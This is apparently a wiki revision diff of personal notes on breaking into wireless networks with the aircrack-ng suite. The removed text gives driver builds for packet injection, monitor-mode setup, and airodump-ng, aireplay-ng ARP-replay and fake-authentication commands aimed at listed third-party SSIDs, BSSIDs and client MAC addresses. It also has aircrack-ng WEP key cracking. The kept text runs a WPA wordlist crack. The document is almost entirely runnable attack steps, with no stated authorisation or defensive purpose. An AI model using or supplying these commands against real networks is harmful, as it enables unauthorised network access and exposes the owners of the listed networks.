|
|
| (12 intermediate revisions by 4 users not shown) |
| Line 2: |
Line 2: |
| yum -y install aircrack-ng | | yum -y install aircrack-ng |
|
| |
|
| For compiling injection drivers.
| | aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de |
| yum -y install kernel-headers
| |
| | |
| Optionally install kismet.
| |
| yum -y install kismet
| |
| | |
| ==compile injection enabled drivers==
| |
| | |
| rt73
| |
| wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
| |
| tar -xjf rt73-k2wrlz-2.0.1.tar.bz2
| |
| cd rt73-k2wrlz-2.0.1/Module
| |
| make
| |
| make install
| |
| modprobe rt73
| |
| | |
| rt61
| |
| wget http://rt2x00.serialmonkey.com/rt61-cvs-daily.tar.gz
| |
| tar xvfz rt61-cvs-daily.tar.gz
| |
| cd rt61-cvs-*
| |
| cd Module
| |
| make
| |
| make install
| |
| | |
| madwifi-ng
| |
| svn -r 2834 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng2834
| |
| wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
| |
| cd madwifi-ng2834
| |
| patch -Np1 -i ../madwifi-ng-r2277.patch
| |
| ./scripts/madwifi-unload
| |
| make
| |
| make install
| |
| depmod -ae
| |
| modprobe ath_pci
| |
| | |
| ==operation==
| |
| | |
| Load and tweaked driver.
| |
| ifconfig rausb0 up
| |
| iwconfig rausb0 mode monitor
| |
| iwpriv rausb0 rfmontx 1
| |
| | |
| Change speed on network card.
| |
| iwconfig rausb0 rate 1M
| |
| | |
| Write comunication from ap.
| |
| airodump-ng --write wifi-network1 --channel 11 --bssid 00:90:4C:7E:00:6E rausb0
| |
| | |
| Generate network comunication.
| |
| aireplay-ng --arpreplay -b 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0
| |
| | |
| Crack web key.
| |
| aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap
| |
| | |
| ==kismet==
| |
| | |
| kismet
| |
| | |
| /etc/kismet/kismet.conf | |
| source=iwl4965,wlan0,addme
| |
| source=rt73,wlan1,wlan1
| |
| source=rt73,rausb0,rausb0
| |
| source=rt2500,rausb0,RT73
| |
| | |
| ==Information==
| |
| | |
| netgear DWL-G122
| |
| mac: 00:1B:11:BC:D5:1B
| |
| | |
| Name : B2_private_49
| |
| SSID : B2_private_49
| |
| BSSID : 00:01:38:9A:91:EC
| |
| Channel : 11
| |
| | |
| Name : vgrox
| |
| SSID : vgrox
| |
| BSSID : 00:13:46:E1:2F:4F
| |
| Channel : 9
| |
| client: 00:13:46:E1:2F:4F
| |
| | |
| airodump-ng --ivs --write dump2 --channel 9 --bssid 00:13:46:E1:2F:4F rausb0
| |
| | |
| ifconfig rausb0 up
| |
| iwconfig rausb0 mode monitor
| |
| iwpriv rausb0 rfmontx 1
| |
| | |
| ==atheros==
| |
| wlanconfig ath create wlandev wifi0 wlanmode monitor
| |
| | |
| ifconfig ath0 down
| |
| wlanconfig ath0 destroy
| |
| wlanconfig ath create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor|wds|ahdemo]
| |
| | |
| ==ongoing==
| |
| 00:40:96:a6:ca:1b
| |
| 00:40:96:a6:ca:1c
| |
| 06:40:96:A6:CA:1C
| |
|
| |
| Name : default
| |
| ESSID : default
| |
| BSSID : 00:13:46:4B:37:DE
| |
| Channel : 6
| |
|
| |
| 00:16:CE:4C:B7:53
| |
|
| |
| airmon-ng stop ath0
| |
| airmon-ng start wifi0 6
| |
| capture iv:s.
| |
| airodump-ng -c 6 --bssid 00:13:46:4B:37:DE -w airdump-ng-defaul ath0
| |
| fake authentication -e name -a -a access point MAC address -h
| |
| aireplay-ng -1 0 -e default -a 00:14:6C:7E:40:80 -h 00:40:96:a6:ca:1c ath0
| |
| aireplay-ng -1 0 -e default -a 00:13:46:4B:37:DE -h 06:40:96:A6:CA:1C ath0
| |
| aireplay-ng -3 -b 00:13:46:4B:37:DE -h 00:16:CE:4C:B7:53 ath0
| |
Install aircrack-ng
yum -y install aircrack-ng
aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de